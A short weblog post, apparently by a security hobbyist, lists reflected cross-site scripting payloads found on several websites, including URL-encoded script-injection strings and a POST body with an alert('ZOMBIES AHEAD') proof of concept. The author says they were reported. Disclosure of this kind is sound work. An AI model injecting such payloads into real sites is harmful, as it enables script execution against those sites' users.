Pack of xss

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

All xss vectors displayed here was reported last weekend and some may have been fixed.;'><script>alert('zombies ahead!');</script><&ss=Business;<script>alert('ZOMBIES AHEAD');</script><;
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0;;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403;!%27)%3b%3c%2fscript%3e

No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.